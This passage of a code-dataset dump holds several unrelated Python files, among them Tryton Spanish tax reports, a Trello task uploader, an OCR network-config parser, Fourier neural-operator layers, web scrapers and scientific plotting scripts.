required=True,\n context={'date_format': '%Y'})\n\n @classmethod\n def default_company(cls):\n return Transaction().context.get('company')\n\n @classmethod\n def default_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n return Date.today()\n\n\nclass AEAT347(Report):\n __name__ = 'account.reporting.aeat347'\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Company = pool.get('company.company')\n t_context = Transaction().context\n\n context = super().get_context(records, data)\n\n context['year'] = str(t_context['date'].year)\n context['company'] = Company(t_context['company'])\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n context['justify'] = justify\n\n def format_decimal(n):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n sign = 'N' if n < 0 else ' '\n return sign + ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n 15, '0')\n context['format_decimal'] = format_decimal\n context['format_integer'] = format_integer\n context['identifier_code'] = identifier_code\n context['country_code'] = country_code\n context['strip_accents'] = strip_accents\n\n return context\n\n\nclass ECOperationList(ECSalesList):\n \"EC Operation List\"\n __name__ = 'account.reporting.es_ec_operation_list'\n\n @classmethod\n def table_query(cls):\n pool = Pool()\n Company = pool.get('company.company')\n Invoice = pool.get('account.invoice')\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Period = pool.get('account.period')\n Tax = pool.get('account.tax')\n context = Transaction().context\n company = Company.__table__()\n invoice = Invoice.__table__()\n move = Move.__table__()\n line = Line.__table__()\n tax_line = TaxLine.__table__()\n period = Period.__table__()\n tax = Tax.__table__()\n\n sales = super().table_query()\n\n where = invoice.company == context.get('company')\n if context.get('start_date'):\n where &= (move.date >= 
context.get('start_date'))\n if context.get('end_date'):\n where &= (move.date <= context.get('end_date'))\n where &= ((tax.es_ec_purchases_list_code != Null)\n & (tax.es_ec_purchases_list_code != ''))\n where &= tax_line.type == 'base'\n where &= invoice.type == 'in'\n purchases = (tax_line\n .join(tax, condition=tax_line.tax == tax.id)\n .join(line, condition=tax_line.move_line == line.id)\n .join(move, condition=line.move == move.id)\n .join(period, condition=move.period == period.id)\n .join(invoice, condition=invoice.move == move.id)\n .join(company, condition=company.id == invoice.company)\n .select(\n Min(tax_line.id).as_('id'),\n Literal(0).as_('create_uid'),\n CurrentTimestamp().as_('create_date'),\n cls.write_uid.sql_cast(Literal(Null)).as_('write_uid'),\n cls.write_date.sql_cast(Literal(Null)).as_('write_date'),\n invoice.tax_identifier.as_('company_tax_identifier'),\n invoice.party.as_('party'),\n invoice.party_tax_identifier.as_('party_tax_identifier'),\n tax.es_ec_purchases_list_code.as_('code'),\n Sum(tax_line.amount).as_('amount'),\n company.currency.as_('currency'),\n where=where,\n group_by=[\n invoice.tax_identifier,\n invoice.party,\n invoice.party_tax_identifier,\n tax.es_ec_purchases_list_code,\n company.currency,\n ]))\n return sales | purchases\n\n\nclass ECOperationListContext(ECSalesListContext):\n \"EC Operation List Context\"\n __name__ = 'account.reporting.es_ec_operation_list.context'\n\n start_date = fields.Date(\"Start Date\",\n domain=[\n If(Eval('end_date'),\n ('start_date', '<=', Eval('end_date')),\n (),\n ),\n ],\n depends=['end_date'])\n end_date = fields.Date(\"End Date\",\n domain=[\n If(Eval('start_date'),\n ('end_date', '>=', Eval('start_date')),\n (),\n ),\n ],\n depends=['start_date'])\n\n @classmethod\n def default_start_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n return Date.today() - relativedelta(months=1, day=1)\n\n @classmethod\n def default_end_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n 
return Date.today() - relativedelta(months=1, day=31)\n\n\nclass AEAT349(Report):\n __name__ = 'account.reporting.aeat349'\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Company = pool.get('company.company')\n t_context = Transaction().context\n\n context = super().get_context(records, data)\n\n context['company'] = Company(t_context['company'])\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n start_date = t_context.get('start_date')\n end_date = t_context.get('end_date')\n if start_date or end_date:\n date = start_date or end_date\n context['year'] = str(date.year)\n if start_date and end_date:\n start_month = start_date.month\n end_month = end_date.month\n if end_month - start_month > 0:\n context['period'] = str(end_month // 3) + 'T'\n context['period_number'] = str(20 + (end_month // 3))\n else:\n context['period'] = str(start_month).rjust(2, '0')\n context['period_number'] = str(start_month).rjust(2, '0')\n\n context['justify'] = justify\n context['format_integer'] = format_integer\n context['format_percentage'] = format_percentage\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n context['justify'] = justify\n context['identifier_code'] = identifier_code\n\n def format_decimal(n, digits=13):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n return ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n digits, '0')\n context['format_decimal'] = format_decimal\n\n return context\n","sub_path":"account_es/reporting_tax.py","file_name":"reporting_tax.py","file_ext":"py","file_size_in_byte":25416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171590851","text":"from trello import TrelloClient\nimport connectSQLite\nimport configuration\nfrom datetime import datetime\n\nimport logging\nlogging.basicConfig(filename='Running.log',level=logging.INFO, format = '%(asctime)s:%(levelname)s:%(message)s')\n\n\nconfig = 
configuration.load_config_file('polical.yaml')\nclient = TrelloClient(\n api_key=config['api_key'],\n api_secret=config['api_secret'],\n token=config['oauth_token'],\n token_secret=config['oauth_token_secret'],\n)\nmember_id = config['owner_id']\n\n\ndef SendTaskToTrello():\n subjectsBoard = client.get_board(config['board_id'])\n tasks = connectSQLite.getTasks()\n if len(tasks) == 0:\n logging.info(\"No existen tareas nuevas, verifique consultando el calendario\")\n print(\"No existen tareas nuevas, verifique consultando el calendario\")\n else:\n for x in tasks:\n logging.info(\"Agregando Tarea:\" + x.subjectID +\" \"+ x.title + \" \" + x.description + \" \" + x.due_date)\n print(\"Agregando Tarea:\")\n x.print()\n subjectList = subjectsBoard.get_list(x.subjectID)\n card = subjectList.add_card(\n x.title, x.description.replace('\\\\n', '\\n'))\n card.assign(member_id)\n x.due_date = x.due_date[0:10] + \" 07:00:00\"\n card.set_due(datetime.strptime(x.due_date, '%Y-%m-%d %H:%M:%S'))\n # print(x.due_date)\n # card.set_due(x.due_date)\n connectSQLite.addTarTID(x.id, subjectList.list_cards()[-1].id)\n","sub_path":"SendTaskToTrello.py","file_name":"SendTaskToTrello.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640049670","text":"import re\n\nfrom calamari_ocr.proto.calamari_pb2 import LayerParams, NetworkParams\n\n\ndef default_network_params():\n params = NetworkParams()\n\n set_default_network_params(params)\n\n return params\n\n\ndef set_default_network_params(params):\n params.solver = NetworkParams.ADAM_SOLVER\n params.dropout = 0\n params.ctc_merge_repeated = True\n params.backend.cudnn = True\n\n\ndef network_params_from_definition_string(str, params):\n cnn_matcher = re.compile(r\"^([\\d]+)(:([\\d]+)(x([\\d]+))?)?$\")\n db_matcher = re.compile(r\"^([\\d]+):([\\d]+)(:([\\d]+)(x([\\d]+))?)?$\")\n concat_matcher = re.compile(r\"^([\\-\\d]+):([\\-\\d]+)$\")\n 
pool_matcher = re.compile(r\"^([\\d]+)(x([\\d]+))?(:([\\d]+)x([\\d]+))?$\")\n str_params = str.split(\",\")\n lstm_appeared = False\n set_default_network_params(params)\n for param in str_params:\n label, value = tuple(param.split(\"=\"))\n flags = [\"ctc_merge_repeated\", \"cudnn\"]\n floats = [\"momentum\", \"dropout\"]\n if label in flags:\n setattr(params, label, value.lower() == \"true\")\n elif label == \"ctc\":\n setattr(params, label, NetworkParams.CTCType.Value(value))\n elif label in floats:\n setattr(params, label, float(value))\n elif label == \"solver\":\n params.solver = {\"momentum\": NetworkParams.MOMENTUM_SOLVER,\n \"adam\": NetworkParams.ADAM_SOLVER}[value.lower()]\n elif label == \"lstm\":\n lstm_appeared = True\n layer = params.layers.add()\n layer.type = LayerParams.LSTM\n layer.lstm_direction = LayerParams.BIDIRECTIONAL_LSTM\n layer.hidden_nodes = int(value)\n elif label == 'concat':\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = concat_matcher.match(value)\n if match is None:\n raise Exception(\"Concat structure needs: concat=[index0]:[index1] but got concat={}\".format(value))\n\n match = match.groups()\n layer = params.layers.add()\n layer.type = LayerParams.CONCAT\n layer.concat_indices[:] = list(map(int, match))\n elif label == \"db\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = db_matcher.match(value)\n if match is None:\n raise Exception(\"Dilated block structure needs: db=[filters]:[depth>0]:[h]x[w]\")\n\n match = match.groups()\n kernel_size = [2, 2]\n if match[2] is not None:\n kernel_size = [int(match[3])] * 2\n if match[4] is not None:\n kernel_size = [int(match[3]), int(match[5])]\n\n layer = params.layers.add()\n layer.type = LayerParams.DILATED_BLOCK\n layer.filters = int(match[0])\n layer.dilated_depth = int(match[1])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x 
= 1\n layer.stride.y = 1\n elif label == \"cnn\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = cnn_matcher.match(value)\n if match is None:\n raise Exception(\"CNN structure needs: cnn=[filters]:[h]x[w] but got {}\".format(value))\n\n match = match.groups()\n kernel_size = [2, 2]\n if match[1] is not None:\n kernel_size = [int(match[2])] * 2\n if match[3] is not None:\n kernel_size = [int(match[2]), int(match[4])]\n\n layer = params.layers.add()\n layer.type = LayerParams.CONVOLUTIONAL\n layer.filters = int(match[0])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = 1\n layer.stride.y = 1\n elif label == \"tcnn\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = cnn_matcher.match(value)\n if match is None:\n raise Exception(\"Transposed CNN structure needs: tcnn=[filters]:[sx]x[sy]\")\n\n match = match.groups()\n kernel_size = [2, 2]\n stride = [2, 2]\n if match[1] is not None:\n stride = [int(match[2])] * 2\n if match[3] is not None:\n stride = [int(match[2]), int(match[4])]\n\n layer = params.layers.add()\n layer.type = LayerParams.TRANSPOSED_CONVOLUTIONAL\n layer.filters = int(match[0])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = stride[0]\n layer.stride.y = stride[1]\n elif label == \"pool\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n match = pool_matcher.match(value)\n if match is None:\n raise Exception(\"Pool structure needs: pool=[h];[w]\")\n\n match = match.groups()\n kernel_size = [int(match[0])] * 2\n if match[1] is not None:\n kernel_size = [int(match[0]), int(match[2])]\n\n if match[3] is not None:\n stride = [int(match[4]), int(match[5])]\n else:\n stride = kernel_size\n\n layer = params.layers.add()\n layer.type = LayerParams.MAX_POOLING\n layer.kernel_size.x = kernel_size[0]\n 
layer.kernel_size.y = kernel_size[1]\n layer.stride.x = stride[0]\n layer.stride.y = stride[1]\n else:\n raise Exception(\"Unknown layer with name: {}\".format(label))\n\n return params\n","sub_path":"calamari_ocr/proto/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599686247","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom functools import partial\n\n\ndef compl_mul1d(a, b):\n # (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)\n op = partial(torch.einsum, \"bix,iox->box\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ], dim=-1)\n\n\ndef compl_mul2d(a, b):\n # (batch, in_channel, x,y,t ), (in_channel, out_channel, x,y,t) -> (batch, out_channel, x,y,t)\n return torch.einsum(\"bixy,ioxy->boxy\", a, b)\n\n\n################################################################\n# 1d fourier layer\n################################################################\n\n\nclass SpectralConv1d(nn.Module):\n # TODO: update code to pytorch 1.8.1\n def __init__(self, in_channels, out_channels, modes1):\n super(SpectralConv1d, self).__init__()\n\n \"\"\"\n 1D Fourier layer. It does FFT, linear transform, and Inverse FFT. 
\n \"\"\"\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes1 = modes1\n\n self.scale = (1 / (in_channels*out_channels))\n self.weights1 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, 2))\n\n def forward(self, x):\n batchsize = x.shape[0]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n x_ft = torch.rfft(x, 1, normalized=True, onesided=True)\n\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.in_channels,\n x.size(-1)//2 + 1, 2, device=x.device)\n out_ft[:, :, :self.modes1] = compl_mul1d(\n x_ft[:, :, :self.modes1], self.weights1)\n\n # Return to physical space\n x = torch.fft.irfft(out_ft)\n return x\n\n################################################################\n# 2d fourier layer\n################################################################\n\n\nclass SpectralConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, modes1, modes2):\n super(SpectralConv2d, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes1 = modes1\n self.modes2 = modes2\n\n self.scale = (1 / (in_channels * out_channels))\n self.weights1 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, dtype=torch.cfloat))\n self.weights2 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, dtype=torch.cfloat))\n\n def forward(self, x, gridy=None):\n batchsize = x.shape[0]\n size1 = x.shape[-2]\n size2 = x.shape[-1]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n x_ft = torch.fft.rfftn(x, dim=[2, 3])\n\n if gridy is None:\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.out_channels, x.size(-2), x.size(-1) // 2 + 1, device=x.device,\n dtype=torch.cfloat)\n out_ft[:, 
:, :self.modes1, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n out_ft[:, :, -self.modes1:, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n\n # Return to physical space\n x = torch.fft.irfftn(out_ft, s=(x.size(-2), x.size(-1)), dim=[2, 3])\n else:\n factor1 = compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n factor2 = compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n x = self.ifft2d(gridy, factor1, factor2, self.modes1, self.modes2) / (size1 * size2)\n return x\n\n def ifft2d(self, gridy, coeff1, coeff2, k1, k2):\n\n # y (batch, N, 2) locations in [0,1]*[0,1]\n # coeff (batch, channels, kmax, kmax)\n\n batchsize = gridy.shape[0]\n N = gridy.shape[1]\n device = gridy.device\n m1 = 2 * k1\n m2 = 2 * k2 - 1\n\n # wavenumber (m1, m2)\n k_x1 = torch.cat((torch.arange(start=0, end=k1, step=1), \\\n torch.arange(start=-(k1), end=0, step=1)), 0).reshape(m1,1).repeat(1,m2).to(device)\n k_x2 = torch.cat((torch.arange(start=0, end=k2, step=1), \\\n torch.arange(start=-(k2-1), end=0, step=1)), 0).reshape(1,m2).repeat(m1,1).to(device)\n\n # K = , (batch, N, m1, m2)\n K1 = torch.outer(gridy[:,:,0].view(-1), k_x1.view(-1)).reshape(batchsize, N, m1, m2)\n K2 = torch.outer(gridy[:,:,1].view(-1), k_x2.view(-1)).reshape(batchsize, N, m1, m2)\n K = K1 + K2\n\n # basis (N, m1, m2)\n basis = torch.exp( 1j * 2* np.pi * K).to(device)\n\n # coeff (batch, channels, m1, m2)\n coeff3 = coeff1[:,:,1:,1:].flip(-1, -2).conj()\n coeff4 = torch.cat([coeff1[:,:,0:1,1:].flip(-1).conj(), coeff2[:,:,:,1:].flip(-1, -2).conj()], dim=-2)\n coeff12 = torch.cat([coeff1, coeff2], dim=-2)\n coeff43 = torch.cat([coeff4, coeff3], dim=-2)\n coeff = torch.cat([coeff12, coeff43], dim=-1)\n\n # Y (batch, channels, N)\n Y = torch.einsum(\"bcxy,bnxy->bcn\", coeff, basis)\n Y = Y.real\n return 
Y","sub_path":"models/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158320318","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nbase_url = 'https://3d-galleru.ru/'\nstart_url = 'https://3d-galleru.ru/archive/cat/kalendar-42/page-1/'\n\nr = requests.get(start_url)\n\nsoup = BeautifulSoup(r.text, 'html.parser')\n\n\ndef page_count(b_soup):\n \"\"\"\n Определяет количество страниц с информацией\n :param b_soup: объект BeautifulSoup\n :return: Количество страниц в формате int\n \"\"\"\n pages = b_soup.find('div', {'id': 'pages'})\n if pages.text == '':\n last_page_find = 1\n else:\n all_pages = str(pages.text)\n if '123456...' in all_pages:\n last_page_find = all_pages[10:]\n else:\n last_page_find = all_pages[-1]\n return int(last_page_find)\n\n\nlast_page = page_count(soup)\ndates = []\ntitles = []\ncards_urls = []\n\n\nfor page_num in range(1, last_page+1):\n \"\"\"\n Проходится по всем страницам с текущими открытками, собирает: \n даты в dates,\n названия праздников в titles,\n ссылки на открытки в card_urls\n \"\"\"\n url = f'https://3d-galleru.ru/archive/cat/kalendar-42/page-{page_num}'\n r1 = requests.get(url)\n soup = BeautifulSoup(r1.text, 'html.parser')\n\n card_dates = soup.find_all('p', {'class': 'name'})\n for card_date in enumerate(card_dates):\n if card_date[0] % 2:\n dates.append(card_date[1].text.replace('\\ue818', ''))\n\n titles_list = soup.find_all('strong')\n for title in titles_list:\n titles.append(title.text)\n\n products = soup.find_all('a', {'class': 'card-image'})\n for product in products:\n url = product.get('href')\n cards_urls.append(url)\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252990353","text":"import cv2\nimport dlib\nimport os\nfrom 
matplotlib.pyplot import imshow\nimport scipy.io\nimport scipy.misc\nimport numpy as np\nfrom PIL import Image\nimport time\nfrom keras import backend as K\nfrom keras.models import load_model\nimport cvlib as cv\nimport threading\nfrom cvlib.object_detection import draw_bbox\nfrom ctypes import *\nimport glob\nimport math\nimport random\nfrom yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes\nfrom yad2k.models.keras_yolo import yolo_head, yolo_eval\n\ntrackingQuality_threshold = 8\nn_frames_to_detect = 45\nmin_confidence = 0.75\n\ninput_movie = cv2.VideoCapture(\"data/test_videos/hamilton_clip.mp4\")\n\nif not input_movie.isOpened():\n print(\"Could not open video file\")\n exit()\n\nlength = int(input_movie.get(cv2.CAP_PROP_FRAME_COUNT))\n\nframe_width = int(input_movie.get(3))\nframe_height = int(input_movie.get(4))\nOUTPUT_SIZE_WIDTH = frame_width\nOUTPUT_SIZE_HEIGHT = frame_height\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\noutput_movie = cv2.VideoWriter('data/track_video/Yolo_keras_object.avi', fourcc, 29.97, (frame_width, frame_height))\n\nwidth = np.array(frame_width, dtype=float)\nheight = np.array(frame_height, dtype=float)\nimage_shape = (height, width)\nclass_names = read_classes(\"model_data/coco_classes.txt\")\nanchors = read_anchors(\"model_data/yolo_anchors.txt\")\nyolo_model = load_model(\"model_data/yolov2.h5\")\n\nyolo_model.summary()\nyolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))\nboxes, scores, classes = yolo_eval(yolo_outputs, image_shape)\nsess = K.get_session()\n\ndef detectAndTrackMultipleFaces():\n\n frame_number = 0\n currentFaceID = 0\n\n cv2.namedWindow(\"base-image\", cv2.WINDOW_AUTOSIZE)\n cv2.namedWindow(\"result-image\", cv2.WINDOW_AUTOSIZE)\n cv2.startWindowThread()\n\n rectangleColor = (0,0,255)\n faceTrackers = {}\n model_image_size = (608, 608)\n start=time.time()\n try:\n while True:\n \n rc, fullSizeBaseImage = input_movie.read()\n if not rc:\n print(\"Could not 
read frame\")\n break\n\n #baseImage = fullSizeBaseImage\n baseImage = cv2.resize( fullSizeBaseImage, ( 608, 608))\n resultImage = baseImage.copy()\n frame_number += 1\n\n pressedKey = cv2.waitKey(2)\n if pressedKey == ord('Q'):\n break\n\n fidsToDelete = []\n for fid in faceTrackers.keys():\n trackingQuality = faceTrackers[ fid ].update( baseImage )\n\n #If the tracking quality is good enough, we must delete\n #this tracker\n if trackingQuality < trackingQuality_threshold:\n fidsToDelete.append( fid )\n\n for fid in fidsToDelete:\n print(\"Removing fid \" + str(fid) + \" from list of trackers\")\n faceTrackers.pop( fid , None )\n\n if (frame_number % n_frames_to_detect) == 0:\n\n #resized_image = baseImage.resize((608, 608), Image.BICUBIC)\n baseImage_data = np.array(baseImage, dtype='float32')\n baseImage_data /= 255.\n baseImage_data = np.expand_dims(baseImage_data, 0) # Add batch dimension.\n\n\n\n#baseImage, baseImage_data = preprocess_image(baseImage, model_image_size = (608, 608))\n out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes],feed_dict={yolo_model.input:baseImage_data,K.learning_phase(): 0})\n\n for i,c in reversed(list(enumerate(out_classes))):\n top, left, bottom, right = out_boxes[i]\n\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(608, np.floor(bottom + 0.5).astype('int32'))\n right = min(608, np.floor(right + 0.5).astype('int32'))\n\n x = left\n y = bottom\n w = right-left\n h = bottom-top\n x_bar = x + 0.5 * w\n y_bar = y + 0.5 * h\n\n matchedFid = None\n\n for fid in faceTrackers.keys():\n tracked_position = faceTrackers[fid].get_position()\n\n t_x = int(tracked_position.left())\n t_y = int(tracked_position.top())\n t_w = int(tracked_position.width())\n t_h = int(tracked_position.height())\n t_x_bar = t_x + 0.5 * t_w\n t_y_bar = t_y + 0.5 * t_h\n\n if ( ( t_x <= x_bar <= (t_x + t_w)) and \n ( t_y <= y_bar <= (t_y + t_h)) and \n ( x <= t_x_bar <= (x + w 
)) and \n ( y <= t_y_bar <= (y + h ))):\n matchedFid = fid\n\n if ((matchedFid is None) and (out_scores[i] > min_confidence)):\n\n print(\"Creating new tracker \" + str(currentFaceID))\n\n tracker = dlib.correlation_tracker()\n tracker.start_track(baseImage,dlib.rectangle( x-10,y-20,x+w+10,y+h+20))\n\n faceTrackers[ currentFaceID ] = tracker\n currentFaceID += 1\n\n for fid in faceTrackers.keys():\n tracked_position = faceTrackers[fid].get_position()\n\n t_x = int(tracked_position.left())\n t_y = int(tracked_position.top())\n t_w = int(tracked_position.width())\n t_h = int(tracked_position.height())\n\n cv2.rectangle(resultImage, (t_x, t_y),(t_x + t_w , t_y + t_h), rectangleColor ,2)\n\n cv2.imshow(\"base-image\", baseImage)\n cv2.imshow(\"result-image\", resultImage)\n output_movie.write(resultImage)\n\n except KeyboardInterrupt as e:\n pass\n end=time.time()-start\n print(\"tiempo: {}\".format(end))\n cv2.destroyAllWindows()\n exit(0)\n\nif __name__ == '__main__':\n detectAndTrackMultipleFaces()\n","sub_path":"computer_vision/track_object_video_3.py","file_name":"track_object_video_3.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"180826287","text":"import pickle, sys\n\nfrom snorkel.snorkel.matchers import *\n#from databases import *\n#sys.path.append('/Users/cameronbaab/Documents/Marker-Reader4')\n\n\ndef getBiomarkerTypeMatcher():\n\n with open('databases/typesDatabase.pickle', 'rb') as f:\n typeDatabase = pickle.load(f)\n typeMatcher = DictionaryMatch(d = typeDatabase, ignore_case = True)\n\n return typeMatcher\n \"\"\"\n max_name = None\n max_count = 0\n count = 0\n #print type(entities)\n while(count < len(entities)):\n numInstances = 0\n counter = count\n while(counter < len(entities) - 1):\n if(entities[counter].mention(attribute=\"words\") == entities[counter + 1].mention(attribute=\"words\")):\n numInstances += 1\n counter += 1\n if(numInstances >= 
max_count):\n max_name = entities[count]\n max_count = numInstances\n count += 1\n return max_name.mention(attribute='words')\n \"\"\"\n","sub_path":"BiomarkerTypeMatcher.py","file_name":"BiomarkerTypeMatcher.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517152970","text":"import seisnn\n\ndatabase = 'Hualien.db'\ndb = seisnn.sql.Client(database)\n\ntfr_list = db.get_matched_list('*', 'tfrecord', 'path')\n\nmodel_instance = 'test_model'\ntrainer = seisnn.model.trainer.GeneratorTrainer(database)\ntrainer.train_loop(tfr_list, model_instance,\n batch_size=64, epochs=10,\n plot=True)\n","sub_path":"scripts/05_training.py","file_name":"05_training.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597911019","text":"''' \n16/08/2018 Plot hm of local walker circulation\n'''\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nimport sh\nfrom hadley_cell import walker_cell\nfrom data_handling_updates import model_constants as mc\nfrom windspharm.xarray import VectorWind\n\n\ndef walker_hm(regions=[[0,10], [10,20], [20,30], [30,40]]):\n \n data = xr.open_dataset('/scratch/rg419/obs_and_reanalysis/era_v_clim_alllevs.nc' )\n data_u = xr.open_dataset('/scratch/rg419/obs_and_reanalysis/era_u_clim_alllevs.nc' )\n \n # Take pentad means\n data.coords['pentad'] = data.day_of_yr //5 + 1. \n data = data.groupby('pentad').mean(('day_of_yr'))\n data_u.coords['pentad'] = data_u.day_of_yr //5 + 1. 
\n data_u = data_u.groupby('pentad').mean(('day_of_yr'))\n \n plot_dir = '/scratch/rg419/plots/overturning_monthly/'\n mkdir = sh.mkdir.bake('-p')\n mkdir(plot_dir)\n \n # Create a VectorWind instance to handle the computation\n w = VectorWind(data_u.u.sel(pfull=np.arange(50.,950.,50.)), data.v.sel(pfull=np.arange(50.,950.,50.)))\n # Compute variables\n streamfun, vel_pot = w.sfvp()\n uchi, vchi, upsi, vpsi = w.helmholtz()\n \n # Set figure parameters\n rcParams['figure.figsize'] = 10, 7\n rcParams['font.size'] = 14\n # Start figure with 4 subplots\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row')\n axes = [ax1,ax2,ax3,ax4]\n \n i=0\n for ax in axes:\n psi_w = walker_cell(uchi, latin=regions[i], dp_in=-50.)\n psi_w /= 1.e9\n i=i+1\n f1=psi_w.sel(pfull=500).plot.contourf(ax=ax, x='lon', y='pentad', add_labels=False, add_colorbar=False, levels=np.arange(-300.,301.,50.), extend='both')\n \n ax1.set_title('0-10 N')\n ax2.set_title('10-20 N')\n ax3.set_title('20-30 N')\n ax4.set_title('30-40 N')\n \n for ax in [ax1,ax2,ax3,ax4]:\n ax.grid(True,linestyle=':')\n ax.set_yticks(np.arange(0.,73., 18.))\n ax.set_xticks([0.,90.,180.,270.,360.])\n \n ax3.set_xlabel('Longitude')\n ax4.set_xlabel('Longitude')\n ax1.set_ylabel('Pentad')\n ax3.set_ylabel('Pentad')\n \n plt.subplots_adjust(left=0.1, right=0.97, top=0.95, bottom=0.1, hspace=0.3, wspace=0.3)\n \n cb1=fig.colorbar(f1, ax=axes, use_gridspec=True, orientation = 'horizontal',fraction=0.05, pad=0.1, aspect=30, shrink=0.5)\n cb1.set_label('Zonal overturning streamfunction')\n \n # Save as a pdf\n plt.savefig(plot_dir + 'walker_cell_hm_era.pdf', format='pdf')\n plt.close()\n \n data.close()\n\nwalker_hm()\n\n","sub_path":"zonal_asym_runs/walker_cell_hm_era.py","file_name":"walker_cell_hm_era.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31119728","text":"\n#resizable window class\nimport 
curses\nimport math\n\n\nclass window_resizable:\n\tdef __init__(self,screen,position_y,position_x):\n\t\tself.initialscreensize = screen.getmaxyx()\n\t\tself.position_y = position_y\n\t\tself.position_x = position_x\n\t\t#percentage of screen\n\t\tself.scale = .8\n\t\tself.win = curses.newwin(int(math.ceil(self.initialscreensize[0]*self.scale)),int(math.ceil(self.initialscreensize[1]*self.scale)),0,0)\n\t\tself.win.border(0)\n\t\tself.win.refresh()\n\n\tdef update(self):\n\t\tself.win.erase()\n\t\tif self.initialscreensize != screen.getmaxyx():\n\t\t\tself.win.refresh()\n\t\t\tself.initialscreensize = screen.getmaxyx()\n\t\tself.win.resize(int(math.ceil(self.initialscreensize[0]*self.scale)),int(math.ceil(self.initialscreensize[1]*self.scale)))\n\t\tself.win.border(0)\n\t\tself.win.refresh()\n\n\n#initial test\n\nscreen = curses.initscr()\ncurses.noecho()\n\nscreen.nodelay(1)#important to block some crap\\\nscreen.refresh()\n\nmy_win = window_resizable(screen,0,0)\nwhile True:\n\tmy_win.win.addstr(1,1,str(my_win.win.getmaxyx()))\n\tmy_win.update()\n\t\n","sub_path":"curses-test/resizableclass.py","file_name":"resizableclass.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"139614130","text":"import requests \nfrom bs4 import BeautifulSoup\n\nURL = input('Cole a url Kabum: ')\nprecoRequirido = float(input(\"Preço esperado: 